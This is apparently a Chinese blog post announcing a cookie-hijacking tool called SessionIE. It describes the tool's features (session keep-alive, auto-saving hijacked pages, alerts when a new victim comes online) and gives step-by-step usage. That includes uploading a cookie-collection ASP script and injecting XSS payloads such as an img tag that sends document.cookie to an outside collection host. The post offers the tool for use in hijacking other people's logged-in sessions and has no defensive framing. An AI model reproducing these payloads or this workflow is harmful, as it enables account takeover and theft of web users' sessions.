SessionIE正式版

公开正式版,并停止更新。

下载地址:http://www.cncert.net/up_files/soft/sessionie-release.rar
演示地址:http://www.cncert.net/up_files/soft/sie.html

SessionIE 正式版
一、什么是 SessionIE

Sessionie是由CCTEAM开发团队开发的通用XSS辅助工具,可利用获取的COOKIE复制相同的http会话到本地以实现直接登录。
二、Sessionie能做什么

l Sessionie可以快速的利用XSS,而无需构造伪页面或代码等繁琐却不能重用的劳力

l Sessionie能即时的跟踪目标来源并进行 Session维持而保持Session的有效性

l Sessionie能结合特定的WEB服务以短信,邮件方式即时通知用户最新上线主机

三、功能特点

1.即时通知上线主机

2.两种COOKIE修改方式,允许将Cookie设置到外部的任意浏览器

3. 完善的导入导出功能

四、界面与说明

Sessionie为单一可执行程序,主界面如图

配置窗口

运行模式

sessionie( 具备session复制功能)

普通ie(正常的IE功能)

使用Pcap

不勾选则使用API模式,

勾选则使用pcap模式,需要设置网卡,该模式可将session设置到外部浏览器

建议使用api模式,当api设置COOKIE失败时可选用pcap模式

维持间隔

维持session的频率 单位为秒

保存结果

可用于无人值守时,自动保存劫持到的html内容,默认保存到report目录下,每个url默认保存两份。

爬虫深度(功能未开放)

用于无人值守时,自动保存劫持到的html的内容,并基于此session进行爬虫搜索的深度值。

相同URL重复次数

来源地址和COOKIE相同可重复出现的记录数

COOKIE脚本地址

用于收集cookie的脚本文件地址

例如:http://www.cncert.net/xss/xssc.asp

密码

Xssc脚本的密码

例如: www.cncert.net

短信提示

网址:用于接收Post数据的地址

表单内容:提交到上面网址的 post数据

注:配置文件为sysconfig.dll ,请不要手动修改配置文件,发生不可修复的错误时,请尝试删除配置文件。

五、如何使用Sessionie

1.修改下载的xsscu.asp里面的密码为你要设置的密码后上传ASP服务器。

2.打开Sessionie的配置窗口,设置好 COOKIE服务器地址和密码,选中Sessionie

3.构造

<img src=http://www.cncert.net/xss/xssc.asp?+document.cookie>

或者<img src=http://www.cncert.net/xss/xsscu.asp?+escape(document.cookie)>

类似语句到目标页面

4.当对方(必须和本地sessionie为不同的公网IP)访问你的XSS页面时候,Sessionie便会拾取到COOKIE

六、如何得到Sessionie
Thk!

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

发表评论